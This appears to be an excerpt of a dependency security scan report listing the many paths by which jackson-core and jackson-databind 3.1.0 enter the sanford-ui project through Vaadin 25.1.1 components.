  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-progress-bar-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-radio-button-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-select-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-side-nav-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-slider-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-split-layout-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-tabs-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-text-field-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-virtual-list-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-grid-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-menu-bar-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-details-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-messages-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-button-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-upload-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-ai-components-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-app-layout-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-avatar-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-badge-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-card-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-checkbox-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-combo-box-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-confirm-dialog-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-custom-field-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-date-picker-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-time-picker-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-dialog-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-form-layout-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-grid-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-icons-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-lumo-theme@25.1.1 com.vaadin:vaadin-icons-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-list-box-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-login-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-markdown-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-master-detail-layout-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-menu-bar-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-notification-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-ordered-layout-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-popover-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-progress-bar-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-radio-button-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-select-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-side-nav-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-slider-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-split-layout-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-tabs-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-text-field-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-virtual-list-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-grid-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-menu-bar-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-grid-flow@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
